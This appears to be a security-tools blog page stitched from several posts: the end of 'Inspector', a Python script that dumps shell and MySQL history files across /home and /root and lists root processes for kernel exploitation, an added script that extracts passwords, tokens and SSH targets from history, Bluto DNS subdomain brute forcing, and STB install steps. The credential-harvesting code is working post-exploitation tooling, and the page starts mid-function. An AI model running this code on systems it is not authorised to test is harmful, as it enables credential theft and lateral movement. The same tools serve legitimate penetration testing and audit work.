	"""Dump every non-empty line of the given history files."""
	if not files:
		print "{!} Can't read " + label
		return
	for path in files:
		try:
			for element in open(path, 'r'):
				if element.strip() != '':
					print "[#] " + element.strip()
		except IOError:
			print "{!} Can't read " + path

def checkShellHistory():
	shell = getShell()
	printHistoryFiles(find_files('.' + shell + '_history'), '.' + shell + '_history')

def checkMySQL():
	printHistoryFiles(find_files('.mysql_history'), '.mysql_history')

def information():
	global uname
	global process_list
	global kernel_version
	kernel_version = os.popen('uname -r').read()
	uname = os.popen('uname -a').read()
	process_list = os.popen('ps axco user,command | grep root').read()
	print "========="
	print "= [!] User > "+os.popen('whoami').read().strip()
	print "= [!] Group > "+os.popen('id -Gn').read().strip()[:20]  
	print "= [!] Shell > "+getShell()
	print "= [!] "+uname.strip()
	print "= [+] Command : process,kernel_exploit,forensic" 
	print "========"

def process_listname():
	global process_list
	list_process = process_list.split('\n')
	for process in list_process:
		if 'mysql' in process:
			print "# " +process
			print "#### [!] MySQL run in root? "
		print "# " + process

def analyse():
	global file_history
	global no_can_open
	for line in file_history:
		if os.path.isfile(line):
			try:
				files = open(line, 'r')
			except IOError:
				no_can_open = no_can_open + 1
				continue
			print "{+} " + line.strip()
			for line2 in files:
				if line2.strip() != '':
					if 'mysql -u' in line2:
						print "# MySQL login found"
						print "	(!) the mysql command line was used to log in, e.g. mysql -u root -p"
						print "	>>> " + line2.strip()
					if 'ssh' in line2:
						print "# SSH found"
						print "	(!) SSH used for a remote connection"
						print "	>>> " + line2.strip()
			files.close()
	if no_can_open:
		print "{!} " + str(no_can_open) + " history file(s) could not be opened"


def kernel_exploit():
	global kernel_version
	print "[!] kernel version: "+kernel_version

def history_help():
	print "=========="
	print "[+] MySQL history > history mysql"
	print "[+] Shell history > history shell"
	print "=========="

def main():
	global file_history
	# collect every history / rc file once, then drop into the interactive prompt
	for fichier in history_listing:
		history = os.popen('find /home /root /Users -name "'+fichier+'" -type f -print 2>/dev/null').read()
		for line in history.split("\n"):
			if line != "":
				file_history.append(line)
	information()
	try:
		while 1:
			prompt = raw_input('Inspector > ').strip()
			if 'forensic' in prompt:
				analyse()
			if 'process' in prompt:
				process_listname()
			if 'kernel_exploit' in prompt:
				kernel_exploit()
			if 'history mysql' in prompt:
				checkMySQL()
			if 'history shell' in prompt:
				checkShellHistory()
			if 'help' in prompt:
				information()
			if prompt == "history":
				history_help()
			if prompt in ("exit", "quit"):
				break
	except (KeyboardInterrupt, EOFError):
		print ""
	print "bye ^^"

if __name__ == '__main__':
	prez()
	main()
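A deeper version of what the forensic command looks for in history files, as an added example that is not Inspector's code: patterns for credential material commonly left in shell and MySQL history (passwords on the mysql command line, sshpass, basic-auth credentials given to curl/wget, secrets exported as environment variables) and the accounts logged into over SSH, each reported with its line number. SAMPLE_HISTORY is constructed; a real run feeds it the lines of the files Inspector finds.

```python
import re

# Categories of credential material commonly left behind in shell and MySQL history.
# Each pattern captures the value worth reporting in group 1.
PATTERNS = [
    ("mysql password on command line", re.compile(r"\bmysql\b.*\s-p(?!\s)(\S+)")),
    ("mysql login",                    re.compile(r"\bmysql\b.*\s-u\s*(\S+)")),
    ("sshpass password",               re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("curl/wget basic auth",           re.compile(r"\b(?:curl|wget)\b.*\s(?:-u|--user)[ =](\S+)")),
    ("secret exported in environment", re.compile(r"\b(?:export\s+)?\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=(\S+)", re.I)),
    ("ssh destination",                re.compile(r"\bssh\b.*?\s(\S+@\S+)")),
]

# Constructed history lines of the kind `find /home -name .bash_history` turns up.
SAMPLE_HISTORY = [
    "ls -la",
    "mysql -u root -pS3cret! -h 10.0.0.5 appdb",
    "mysql -u app -p",
    "sshpass -p 'Winter2016' ssh deploy@10.0.0.9",
    "export DB_PASSWORD=hunter2",
    "curl -u admin:admin http://10.0.0.5/api/status",
    "ssh -i ~/.ssh/id_rsa ops@bastion.internal",
]


def analyse_history(lines):
    """One finding per (line, category) hit: line number, category, captured value, command."""
    findings = []
    for number, raw in enumerate(lines, 1):
        command = raw.strip()
        if not command:
            continue
        for category, pattern in PATTERNS:
            match = pattern.search(command)
            if match:
                findings.append({
                    "line": number,
                    "category": category,
                    "value": match.group(1).strip("'\""),   # drop shell quoting around the value
                    "command": command,
                })
    return findings


def summarise(findings):
    """Collapse findings to the set of (category, value) pairs, the view you want at a glance."""
    return {(f["category"], f["value"]) for f in findings}
```

A bare "mysql -u app -p" (password prompted, not given) is reported only as a login, not as a leaked password; the ssh destinations are worth keeping even without credentials, since the matching key in ~/.ssh is the next thing to look for.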

Source: https://github.com/graniet

Bluto v1.1.22 ~ DNS Recon | Brute Forcer | DNS Zone Transfers | Email Enumeration | User Enumeration.


Changelog v1.1.22 Full Featured:
+ setup.py and Bluto folder version Fix.

Bluto v1.1.22

Bluto v1.1.22

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto v1.1.14 attempting to brute force the target domain.

Bluto has been tested on Ubuntu, Arch Linux, CentOS, FreeBSD, Red Hat, Fedora, Debian and Kali 2.0.
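The brute-force and merge stages of the procedure above, as an added example (not Bluto's code): labels from a wordlist are resolved concurrently, a wildcard record is detected first by resolving random labels so that wildcard answers are discarded, and the survivors are merged with the passive list, deduplicated and flagged when the label is one worth a closer look. The resolver is pluggable: system_resolve uses the OS resolver, while FAKE_ZONE, WORDLIST and PASSIVE are constructed and run_demo uses them so the block runs offline.

```python
import random
import socket
import string
from concurrent.futures import ThreadPoolExecutor

# Constructed zone: three real names plus a wildcard that answers for everything else.
FAKE_ZONE = {
    "www.example.com": "203.0.113.10",
    "mail.example.com": "203.0.113.5",
    "dev.example.com": "203.0.113.20",
}
FAKE_WILDCARD_IP = "203.0.113.99"
WORDLIST = ["www", "dev", "ftp", "admin", "vpn"]          # stands in for the Alexa-derived list
PASSIVE = {"www.example.com": "203.0.113.10", "mail.example.com": "203.0.113.5"}  # NetCraft-style
INTERESTING = ("dev", "staging", "test", "vpn", "admin", "git", "jenkins", "backup", "internal")


def fake_resolve(name):
    """Resolver for the demo; a real run passes system_resolve instead."""
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    return FAKE_WILDCARD_IP if name.endswith(".example.com") else None


def system_resolve(name):
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def detect_wildcard(domain, resolve, probes=3):
    """Resolve random labels; any answers mean the zone has a wildcard and these are its IPs."""
    ips = set()
    for _ in range(probes):
        label = "".join(random.choice(string.ascii_lowercase) for _ in range(14))
        ip = resolve("%s.%s" % (label, domain))
        if ip:
            ips.add(ip)
    return ips


def brute_force_subdomains(domain, wordlist, resolve=system_resolve, workers=32):
    """Concurrent brute force; hits that only resolve because of a wildcard are dropped
    (a real host sharing the wildcard IP is lost too, the known limitation of this filter)."""
    wildcard_ips = detect_wildcard(domain, resolve)

    def probe(label):
        fqdn = "%s.%s" % (label, domain)
        ip = resolve(fqdn)
        return (fqdn, ip) if ip and ip not in wildcard_ips else None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(hit for hit in pool.map(probe, wordlist) if hit)


def merge_results(passive, brute):
    """Union of both sources, deduplicated by name, each entry tagged with where it came from
    and whether the label is one worth a closer look."""
    merged = {}
    for source, results in (("passive", passive), ("brute", brute)):
        for fqdn, ip in results.items():
            entry = merged.setdefault(fqdn.lower(), {"ip": ip, "sources": set()})
            entry["sources"].add(source)
    for fqdn, entry in merged.items():
        label = fqdn.split(".")[0]
        entry["interesting"] = any(tok in label for tok in INTERESTING)
    return merged


def run_demo():
    brute = brute_force_subdomains("example.com", WORDLIST, resolve=fake_resolve)
    return merge_results(PASSIVE, brute)
```

Without the wildcard check a 20000-word list against a wildcarded zone returns 20000 "subdomains", all pointing at the same address; checking random labels first costs a few queries and keeps the report honest.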

Installation And Update Using Git:

pip install git+git://github.com/RandomStorm/Bluto
Upgrade:
pip install git+git://github.com/RandomStorm/Bluto --upgrade

Our Post Before
Source: https://github.com/RandomStorm

STB – Security Tools Builder.


STB – Security Tools Builder.
What’s STB?
This project helps you create the skeleton for a hacking tool.
STB uses the OMSTD methodology concepts to build a reusable application.
Background on OMSTD:
+ OMSTD (Open Methodology for Security Tool Developers) is a series of case studies, grouped and categorized as a guide, for developing well-built tools.
+ Although it can be used to create any type of tool in any language, it focuses primarily on the development of hacking tools written in Python.

Usage & Download:

git clone https://github.com/abirtone/STB && cd STB
pip install -r requirements.txt
python setup.py install (or using pip: pip install stb)

then
cd your folder name
pip install -r requirements.txt
python setup.py install
sudo [your tools name] -h

Source: https://github.com/abirtone
